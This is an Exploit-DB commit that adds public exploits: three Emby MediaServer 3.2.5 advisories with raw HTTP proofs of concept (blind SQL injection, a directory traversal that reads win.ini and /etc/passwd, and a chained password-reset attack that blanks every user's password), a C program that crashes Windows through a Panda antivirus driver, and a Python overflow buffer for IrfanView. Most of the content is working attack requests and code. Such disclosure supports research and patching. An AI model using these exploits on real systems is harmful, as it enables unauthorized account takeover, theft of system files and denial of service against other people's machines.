DB: 2017-05-01

5 new exploits

Panda Free Antivirus - 'PSKMAD.sys' Denial of Service
IrfanView 4.44 - Denial of Service
Emby MediaServer 3.2.5 - SQL Injection
Emby MediaServer 3.2.5 - Password Reset
Emby MediaServer 3.2.5 - Directory Traversal
This commit is contained in:
Offensive Security 2017-05-01 05:01:18 +00:00
parent 72f98fab1c
commit e4147fb21e
6 changed files with 513 additions and 0 deletions

View file

@ -5479,6 +5479,8 @@ id,file,description,date,author,platform,type,port
41931,platforms/multiple/dos/41931.html,"Apple Safari - Array concat Memory Corruption",2017-04-25,"Google Security Research",multiple,dos,0
41932,platforms/multiple/dos/41932.cpp,"Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Double-Free",2017-04-25,"Google Security Research",multiple,dos,0
41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0
41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -37794,3 +37796,6 @@ id,file,description,date,author,platform,type,port
41940,platforms/php/webapps/41940.py,"TYPO3 News Module - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80
41943,platforms/php/webapps/41943.py,"Simple File Uploader - Arbitrary File Download",2017-04-27,"Daniel Godoy",php,webapps,0
41944,platforms/php/webapps/41944.txt,"Easy File Uploader - Arbitrary File Upload",2017-04-27,"Daniel Godoy",php,webapps,0
41946,platforms/multiple/webapps/41946.txt,"Emby MediaServer 3.2.5 - SQL Injection",2017-04-30,LiquidWorm,multiple,webapps,0
41947,platforms/multiple/webapps/41947.txt,"Emby MediaServer 3.2.5 - Password Reset",2017-04-30,LiquidWorm,multiple,webapps,0
41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,66 @@
Emby MediaServer 3.2.5 Boolean-based Blind SQL Injection Vulnerability
Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
3.1.5
3.1.2
3.1.1
3.1.0
3.0.0
Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.
Desc: Emby suffers from a blind SQL injection vulnerability. Input passed via the GET
parameter 'MediaTypes' is not properly sanitised before being returned to the user
or used in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Ubuntu Linux 14.04.5
MacOS Sierra 10.12.3
SQLite3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5400
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5400.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
22.12.2016
--
PoC:
GET /emby/Users/abb355429db54e159ac2a7a3cbd6eb12/Items?ParentId=4cd160cad6c50f34ca42be0136af2316&Filters=IsNotFolder&Recursive=true&SortBy=SortName&MediaTypes=Audio%2cVideo'&Limit=100&Fields=MediaSources%2CChapters&ExcludeLocationTypes=Virtual HTTP/1.1
Host: 10.211.55.3:8096
accept: application/json
x-mediabrowser-token: ba5a68dfa1134bd6af642228bbf757bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome 55.0.2883.87", DeviceId="104a154d5aa8c9576a2508113b47a53b6170253c", Version="3.1.0.0", UserId="abb355429db54e159ac2a7a3cbd6eb12"
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close
Response:
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Mono-HTTPAPI/1.0
Date: Tue, 21 Feb 2017 12:06:09 GMT
Content-Length: 64
Connection: close
Exception of type 'SQLitePCL.pretty.SQLiteException' was thrown.

View file

@ -0,0 +1,166 @@
Emby MediaServer 3.2.5 Password Reset Vulnerability
Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
3.1.5
3.1.2
3.1.1
3.1.0
3.0.0
Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.
Desc: The issue can be triggered by an unauthenticated actor within the home network
(LAN) only. The attacker doesn't need to specify a valid username to reset the
password. He or she can enter a random string, and using the file disclosure issue
it's possible to read the PIN needed for resetting. This in turn will disclose all
the valid usernames in the emby server and reset all the passwords for all the users
with a blank password. Attackers can exploit this to gain unauthenticated and unauthorized
access to the emby media server management interface.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Ubuntu Linux 14.04.5
MacOS Sierra 10.12.3
SQLite3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5401
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5401.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
22.12.2016
--
1. First we initiate the Forgot Password feature from within our home network:
------------------------------------------------------------------------------
http://10.211.55.3:8096/web/forgotpassword.html
2. Then, we type any random username and hit submit:
----------------------------------------------------
POST /emby/Users/ForgotPassword HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 32
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpassword.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1
EnteredUsername=RandomusUsuarius
3. You will get an alert message (Windows/Linux):
-------------------------------------------------
The following file has been created on your server and contains instructions on how to proceed:
C:\Users\lqwrm\AppData\Roaming\\Emby-Server\passwordreset.txt
-- OR --
/var/lib/emby-server/passwordreset.txt
4. Exploiting the file disclosure vulnerability (ZSL-2017-5403):
----------------------------------------------------------------
GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\lqwrm\AppData\Roaming\Emby-Server\passwordreset.txt HTTP/1.1
Host: 10.211.55.3:8096
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close
HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "c4fd834ac2fc99ff99d74c8e994a8a71"
Cache-Control: public
Expires: -1
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: text/plain
Date: Tue, 28 Feb 2017 12:14:51 GMT
Content-Length: 164
Connection: close
Use your web browser to visit:
http://10.211.55.3:8096/web/forgotpasswordpin.html
Enter the following pin code:
6727
The pin code will expire at 91
5. Following the instructions, entering the PIN, results in resetting all the passwords for all the emby users on the system:
-----------------------------------------------------------------------------------------------------------------------------
POST /emby/Users/ForgotPassword/Pin HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 9
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpasswordpin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1
Pin=6272
---
We get the message:
Passwords have been removed for the following users. To login, sign in with a blank password.
testingus
test321
beebee
admin
ztefan
lio
miko
dni
embyusertest
joxypoxy
test123
thricer
teppei
admin2
delf1na

View file

@ -0,0 +1,157 @@
Emby MediaServer 3.2.5 Directory Traversal File Disclosure Vulnerability
Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
3.1.5
3.1.2
3.1.1
3.1.0
3.0.0
Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.
Desc: The vulnerability was confirmed on tested platforms depending on the version.
Version 3.1.0 is affecting Linux, Windows and Mac platforms. The 3.2.5 only affects
Windows release. Input passed via the 'swagger-ui' object in SwaggerService.cs is not
properly verified before being used to load resources. This can be exploited to disclose
the contents of arbitrary files via directory traversal attacks.
================================================================================
/Emby.Server.Implementations/HttpServer/SwaggerService.cs:
----------------------------------------------------------
using MediaBrowser.Controller;
using MediaBrowser.Controller.Net;
using System.IO;
using MediaBrowser.Model.IO;
using MediaBrowser.Model.Services;
namespace Emby.Server.Implementations.HttpServer
{
public class SwaggerService : IService, IRequiresRequest
{
private readonly IServerApplicationPaths _appPaths;
private readonly IFileSystem _fileSystem;
public SwaggerService(IServerApplicationPaths appPaths, IFileSystem fileSystem, IHttpResultFactory resultFactory)
{
_appPaths = appPaths;
_fileSystem = fileSystem;
_resultFactory = resultFactory;
}
/// <summary>
/// Gets the specified request.
/// </summary>
/// <param name="request">The request.</param>
/// <returns>System.Object.</returns>
public object Get(GetSwaggerResource request)
{
var swaggerDirectory = Path.Combine(_appPaths.ApplicationResourcesPath, "swagger-ui");
var requestedFile = Path.Combine(swaggerDirectory, request.ResourceName.Replace('/', _fileSystem.DirectorySeparatorChar));
return _resultFactory.GetStaticFileResult(Request, requestedFile).Result;
}
/// <summary>
/// Gets or sets the result factory.
/// </summary>
/// <value>The result factory.</value>
private readonly IHttpResultFactory _resultFactory;
/// <summary>
/// Gets or sets the request context.
/// </summary>
/// <value>The request context.</value>
public IRequest Request { get; set; }
}
}
================================================================================
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Ubuntu Linux 14.04.5
MacOS Sierra 10.12.3
SQLite3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5403
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5403.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
22.12.2016
--
GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "07bec80f76d20d26dd300a855219d321"
Cache-Control: public
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: application/octet-stream
Date: Thu, 22 Dec 2016 10:43:53 GMT
Content-Length: 403
Connection: close
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
==========================
On Linux:
http://127.0.0.1/%2femby%2fswagger-ui%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
...

89
platforms/windows/dos/41945.c Executable file
View file

@ -0,0 +1,89 @@
/*
# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
# Date: 2017-04-29
# Exploit Author: Peter baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
# Version: 18.0
# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
# CVE : requested
*/
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>
#define DEVICE_NAME L"\\\\.\\PSMEMDriver"
LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
HANDLE hFile = NULL;
hFile = CreateFile(FileName,
GENERIC_READ | GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
NULL,
0);
return hFile;
}
int main()
{
HANDLE hFile = NULL;
PVOID64 lpInBuffer = NULL;
ULONG64 lpBytesReturned;
PVOID64 BuffAddress = NULL;
SIZE_T BufferSize = 0x800;
printf("Trying the get the handle for the PSMEMDriver device.\r\n");
hFile = GetDeviceHandle(FileName);
if (hFile == INVALID_HANDLE_VALUE) {
printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());
return 1;
}
// Allocate memory for our buffer
lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (lpInBuffer == NULL) {
printf("VirtualAlloc() failed. \r\n");
return 1;
}
BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
*(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???
BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
*(PULONG64)BuffAddress = (ULONG64)0x42424242;
BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));
RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);
DeviceIoControl(hFile,
0xb3702c38,
lpInBuffer,
NULL, //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory
NULL,
NULL,
&lpBytesReturned,
NULL);
/*This part is pretty much useless, just wanted to be nice in case the machine survives.*/
printf("Cleaning up.\r\n");
VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE);
CloseHandle(hFile);
printf("Resources freed up.\r\n");
return 0;
}

30
platforms/windows/dos/41949.py Executable file
View file

@ -0,0 +1,30 @@
# Exploit Title: Irfanview - OtherExtensions Input Overflow
# Date: 29-04-2017
# Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button
# Exploit Author: Dreivan Orprecio
#Version: Irfanview 4.44
#Irfanview is vulnerable to overflow in "OtherExtensions" input field
#Debugging Machine: WinXP Pro SP3 (32bit)
#POC
#!usr/bin/python
eip = "\xf7\x56\x44\x7e" #jmp esp from user32.dll
buffer = "OtherExtensions="+"A" * 199 + eip + "\xcc"
print buffer #a) irfanview->Option->Properties/Settings->Extensions
#b) Paste the buffer in the "other" input then press ok, repeat a) and b)
#badcharacters: those instruction that start with 6,7,8,E,F
#Only 43 bytes space to host a shellcode and lots of badchars make it hard for this to exploit
#Any other way around this?